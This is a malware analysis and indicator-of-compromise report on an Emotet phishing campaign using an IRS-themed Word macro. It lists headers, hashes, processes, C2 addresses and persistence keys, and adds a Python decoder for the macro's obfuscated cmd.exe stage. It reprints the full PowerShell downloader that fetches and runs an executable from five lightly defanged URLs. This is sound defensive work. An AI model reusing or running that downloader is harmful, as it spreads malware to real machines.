
#emotet_041218

VRad Dec 4th, 2018 (edited)
#IOC #OptiData #VR #emotet #feodo #W97M #Powershell

https://pastebin.com/znQDtbnt

previous contact:
09/11/18    https://pastebin.com/THHMs2wg
01/10/18    https://pastebin.com/Y6DnbpHv

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
https://kc.mcafee.com/corporate/index?page=content&id=KB90108

attack_vector
--------------
email attach .doc > macro > cmd > powershell > GET 5 URLs > %temp%\***.exe

email_headers
--------------
Received: from smtp01-sa.serv.net.mx (smtp01-sa.serv.net.mx [201.150.39.117])
    by srv8.victim1.com for <user0@org6.victim1.com>;
    (envelope-from erandeni.perez@sepsa.org.mx)
Received: from 10.8.54.72 (unknown [190.188.102.74])
    by smtp01-sa.serv.net.mx (Postfix) for <user0@org6.victim1.com>;
Date: Tue, 04 Dec 2018 10:56:22 -0300
From: IRS Online  <erandeni.perez@sepsa.org.mx>
To: user0@org6.victim1.com
Subject:  Record of Account Transcript from December 04, 2018

files
--------------
SHA-256 a32a0481b51ec5eed9b5fbda8bbb75d9961f3f80ede0ddf2a53c51551b785eb4
File name   Record of Account Transcript.doc    [OLE CF]
File size   78.38 KB

SHA-256 e8f2ff23543e3d48a08b9e941de5858a298ef7830ba76c983e8c4d50dc2cbf4b
File name   LwnfI36ghV.exe              [PE32 executable (GUI) Intel 80386, for MS Windows]
File size   120 KB

activity
**************

doc_macro:
--------------
command: c:\MOJtGcAfUfB\jvfcYdzZi\jvpPUlOiZz\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68...)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!""

command: C:\Windows\system32\cmd.exe CmD /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68...)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!""

command: powershell.exe "$qjK='FfL';$rot=new-object Net.WebClient;$zoZ='h11p:\ vcube-vvp{.} com/0Tfl6UZQ@h11p:\ closhlab{.} com/bQh2tz4@h11p:\ dekormc{.} pl/pub/H0eeOPRkwr@h11p:\ careerzinn{.} in/nl8cpNgBAl@h11p:\ broganfamily{.} org/IXzUnQA0Q'.Split('@');$SPG='oIK';$IRS = '145';$kJl='CHs';$Taw=$env:temp+'\'+$IRS+'.exe';foreach($zLq in $zoZ){try{$rot.DownloadFile($zLq, $Taw);$YvI='TOK';If ((Get-Item $Taw).length -ge 80000) {Invoke-Item $Taw;$naH='khT';break;}}catch{}}$YKh='BhK';"


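The two cmd.exe commands above hide the PowerShell stage with substring indexing: `%ProgramData:~0,1%%ProgramData:~9,2%` spells the launcher name, and the `for %a in (...)` loop copies one character of the key string R1F per index. The decoder below is added analysis code, not part of the original paste; it assumes the default ProgramData path and replays both tricks offline on the paste's own command (index list truncated with "..." exactly as on the page), so the visible indices 16;7;44;20;68 come out as `$qjK=`, the opening of the PowerShell command listed above.

```python
import re

# Constructed environment value (the Windows default); the paste's launcher builds
# the string "CmD" from it with %ProgramData:~0,1%%ProgramData:~9,2%.
ASSUMED_ENV = {"ProgramData": r"C:\ProgramData"}

# The paste's first doc_macro command, index list truncated ("...") as on the page.
SAMPLE_CMD = (
    r'c:\MOJtGcAfUfB\jvfcYdzZi\jvpPUlOiZz\..\..\..\windows\system32\cmd.exe /c '
    r'%ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set R1F='
    r"pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z"
    r'&&for %a in (16;7;44;20;68...)do set Jbd=!Jbd!!R1F:~%a,1!'
    r'&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!""'
)

def cmd_substring(value: str, start: int, length: int) -> str:
    """Mimic cmd.exe %VAR:~start,len%: negative values count from the end,
    and an out-of-range start yields the empty string."""
    if start < 0:
        start = max(len(value) + start, 0)
    end = len(value) + length if length < 0 else start + length
    return value[start:end]

def expand_env_substrings(cmdline: str, env: dict) -> str:
    """Resolve every %VAR:~start,len% token whose VAR is present in env."""
    def repl(m):
        if m.group(1) not in env:
            return m.group(0)
        return cmd_substring(env[m.group(1)], int(m.group(2)), int(m.group(3)))
    return re.sub(r"%(\w+):~(-?\d+),(-?\d+)%", repl, cmdline)

def decode_for_loop(cmdline: str) -> str:
    """Replay `for %a in (i;j;...) do set X=!X!!KEY:~%a,1!` without running cmd.exe."""
    ref = re.search(r"!(\w+):~%(\w),(\d+)!", cmdline)
    if not ref:
        raise ValueError("no !KEY:~%a,n! substring reference found")
    key_name, loop_var, width = ref.group(1), ref.group(2), int(ref.group(3))
    key = re.search(r"set\s+" + re.escape(key_name) + r"=(.*?)&&", cmdline).group(1)
    indices = re.search(r"for\s+%" + loop_var + r"\s+in\s*\(([^)]*)\)", cmdline).group(1)
    # Only digit runs count (the page's "..." is ignored); the out-of-range index that
    # trips "if %a gtr 74" expands to nothing in cmd.exe, so it adds nothing here either.
    return "".join(cmd_substring(key, int(i), width) for i in re.findall(r"\d+", indices))

if __name__ == "__main__":
    print(expand_env_substrings(SAMPLE_CMD, ASSUMED_ENV)[:120])  # launcher resolves to "CmD"
    print(decode_for_loop(SAMPLE_CMD))  # visible indices spell the start of the PowerShell stage
```

With the complete index list from a live sample, decode_for_loop returns the whole PowerShell command, so the downloader can be read without executing the macro.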
PL_SCR:
h11p:\ vcube-vvp{.} com/0Tfl6UZQ    404
h11p:\ closhlab{.} com/bQh2tz4      200
h11p:\ dekormc{.} pl/pub/H0eeOPRkwr 200
h11p:\ careerzinn{.} in/nl8cpNgBAl  404
h11p:\ broganfamily{.} org/IXzUnQA0Q    404

C2: h11p:\ 187.160.2.73:443
    h11p:\ 80.149.179.98:7080
    h11p:\ 200.6.168.130:990

netwrk
--------------
103.246.17.7        vcube-vvp.com       GET /0Tfl6UZQ   HTTP/1.1    noUA
69.65.3.251         closhlab.com        GET /bQh2tz4    HTTP/1.1    noUA
69.65.3.251         closhlab.com        GET /bQh2tz4/   HTTP/1.1    noUA    [!This program cannot be run in DOS mode.]
187.160.2.73        187.160.2.73:443    GET /       HTTP/1.1    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;
80.149.179.98       80.149.179.98:7080  GET /       HTTP/1.1    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;
200.6.168.130       200.6.168.130:990   GET /       HTTP/1.1    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;

comp
--------------
powershell.exe  103.246.17.7    80  SYN_SENT
stgintel.exe    187.160.2.73    443 ESTABLISHED
stgintel.exe    80.149.179.98   7080    ESTABLISHED
stgintel.exe    200.6.168.130   990 ESTABLISHED

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
c:\windows\SysWOW64\cmd.exe c:\MOJtGcAfUfB\jvfcYdzZi\jvpPUlOiZz\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68...)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!""
C:\Windows\SysWOW64\cmd.exe CmD  /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68...)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "$qjK='FfL';$rot=new-object Net.WebClient;$zoZ='h11p:\ vcube-vvp{.} com/0Tfl6UZQ@h11p:\ closhlab{.} com/bQh2tz4@h11p:\ dekormc{.} pl/pub/H0eeOPRkwr@h11p:\ careerzinn{.} in/nl8cpNgBAl@h11p:\ broganfamily{.} org/IXzUnQA0Q'.Split('@');$SPG='oIK';$IRS = '145';$kJl='CHs';$Taw=$env:temp+'\'+$IRS+'.exe';foreach($zLq in $zoZ){try{$rot.DownloadFile($zLq, $Taw);$YvI='TOK';If ((Get-Item $Taw).length -ge 80000) {Invoke-Item $Taw;$naH='khT';break;}}catch{}}$YKh='BhK';"
"C:\tmp\145.exe"
"C:\Users\operator\AppData\Local\stgintel\stgintel.exe"

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              04.12.2018 22:28
stgintel    Softpub Forwarder DLL   Nexon Corp. c:\users\operator\appdata\local\stgintel\stgintel.exe   21.08.2007 4:59

drop
--------------
C:\tmp\145.exe
C:\Users\operator\AppData\Local\stgintel\stgintel.exe

# # #
https://www.virustotal.com/#/file/a32a0481b51ec5eed9b5fbda8bbb75d9961f3f80ede0ddf2a53c51551b785eb4/details
https://www.virustotal.com/#/file/e8f2ff23543e3d48a08b9e941de5858a298ef7830ba76c983e8c4d50dc2cbf4b/details
https://analyze.intezer.com/#/analyses/47e2d372-0318-42d4-a6fd-bd5ae3c89f9a

VR